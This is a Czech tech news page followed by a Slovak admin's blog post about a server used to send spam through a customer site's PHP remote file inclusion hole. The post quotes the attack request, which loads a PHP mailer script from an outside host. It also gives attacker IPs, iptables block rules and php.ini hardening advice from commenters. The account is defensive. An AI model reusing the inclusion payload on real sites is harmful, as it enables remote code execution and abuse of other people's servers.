24. září 2024 budou zveřejněny zdrojové kódy přehrávače Winamp.
Google Chrome 125 byl prohlášen za stabilní. Nejnovější stabilní verze 125.0.6422.60 přináší řadu oprav a vylepšení (YouTube). Podrobný přehled v poznámkách k vydání. Opraveno bylo 9 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.
Textový editor Neovim byl vydán ve verzi 0.10 (𝕏). Přehled novinek v příspěvku na blogu a v poznámkách k vydání.
Byla vydána nová verze 6.3 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 13.0.15.
Dnes ve 12:00 byla spuštěna první aukce domén .CZ. Zatím největší zájem je o dro.cz, kachnicka.cz, octavie.cz, uvycepu.cz a vnady.cz [𝕏].
JackTrip byl vydán ve verzi 2.3.0. Jedná se o multiplatformní open source software umožňující hudebníkům z různých částí světa společné hraní. JackTrip lze instalovat také z Flathubu.
Patnáctý ročník ne-konference jOpenSpace se koná 4. – 6. října 2024 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytváří všichni účastníci, se skládá z desetiminutových
… více »Program pro generování 3D lidských postav MakeHuman (Wikipedie, GitHub) byl vydán ve verzi 1.3.0. Hlavní novinkou je výběr tvaru těla (body shapes).
Intel vydal 41 upozornění na bezpečnostní chyby ve svých produktech. Současně vydal verzi 20240514 mikrokódů pro své procesory řešící INTEL-SA-01051, INTEL-SA-01052 a INTEL-SA-01036.
Společnost Raspberry Pi patřící nadaci Raspberry Pi chystá IPO a vstup na Londýnskou burzu.
Dalsia prihoda, ktora zvyraznuje moj odpor ku SPAMu
Ked sme sli s mojou polovickou domov z prace dostal som SMS v zneni:"Caves, nejaky problem so serverom?nejde ani web ani ftp". Nevedel som o koho ide, kedze sa nepodpisal, tak som mu volal spat. Ukazalo sa, ze je to kamarat X!ch. Prislubil som mu, ze ked sa dostanem domov, tak mu na to pozriem. Predpokladal som, ze ma problem on so sietov. Za 10 minut som dostal druhu SMS od kamarata JOHANIATKA. Napisal:"Ahoj. Vypadok servera ...uz je to viac ako hodinu(Len pre info, ci o tom viete). Majo". Pridali sme do kroku s polovickou. Asi sa nieco deje.
Dosiel som domov...pingat server islo...aj SSH siel. Ale pozeral som, ze vsetka RAMka bola zozrata Postfixom a Apachom. Vo vronte Postfixu bolo 25 000 sprav, ktore boli poslane od uzivatela www-data na nezname/neexistujuce adresy. Tak reku, ze niekto sa bavi. Hladal som ale nic som nenasiel. Ked som restartol Apacha, prestali chodit dalsie maily do fronty. Tak som bol spokojny sam zo sebou. Vymazal som maily z fronty a bol pokoj.
Na dalsi ten som robil nieco na pocitaci. Isiel som si cez webmail pozriet svoju postu a na uvitacej stranke Horde som nasiel spravu od servra, ze ma malo miesta na disku. Prihlasim sa ma masinu vidim, ze je plny disk na ktorom su e-maily z fronty Postfixu. Pozriem do fronty a vo fronte 55 000 nedorucenych mailov. Rozhodol som sa hladat co sa uchylak toto robi. Po asi hodine hladania som dosiel na nasledovne veci:
- Pozrel som si server-status pre Apacheho a nasiel som nasledovnu podozrivu linku: DOMENA/main.php?p=http://www.danfortier.com/en/style.txt?. Kuknem na web a co nevidim? V stranke zakaznika je vlozeny formular zo stranky http://www.danfortier.com/en/style.txt. Ked si pozries tu stranku, je to cisty PHP kod na zasielanie mailov.
- Pozeral som logy a dosiel som na 4 IP adresy odkial to spustali: 196.1.176.194, 88.101.234.10, 82.206.131.126 a 195.225.62.76. Samozrejme dostali DROP do iptables:
iptables --list -v -n -t raw
...
46 2804 DROP all -- eth0 * 196.1.176.194 0.0.0.0/0
0 0 DROP all -- eth0 * 88.101.234.10 0.0.0.0/0
0 0 DROP all -- eth0 * 82.206.131.126 0.0.0.0/0
0 0 DROP all -- eth0 * 195.225.62.76 0.0.0.0/0
...
- Poziadal som vyvojara webu (dost znamu firmu) na opravenie diery vo webe, pretoze to moze dospiet az k vypnutiu ich webu.
Takze mili admini, bacha na derave weby, ktore su mozno aj u vas hostovane. Dostanete sa do black-listov bez svojeho zapricinenia a ani neviete ako a zase budete vy ty najhorsi, pretoze zakaznikovi nejde posielat maily .
Tiskni Sdílej:
allow_url_fopen = Offa
allow_url_include = Offv php.ini. Všetky aplikácie na hostingu sa celkom dobre auditovať nedajú, a toto zabráni presne takémuto zneužitiu deravej aplikácie. Je síce potom trošku problematickejšie využívanie off-site zdrojov pre programátorov, ale nie je to nič nezvládnuteľné (namiesto jednoduchého include alebo fopen treba použiť knižnicu CURL).
To fakt není nějaká možnost jak to automaticky zahazovat než to zahltí server?Skusit to zahadzovat pred serverom (nejaky stroj na pred-triedovanie posty) - ale neviem ci sa tym vyriesi "zahltenie"...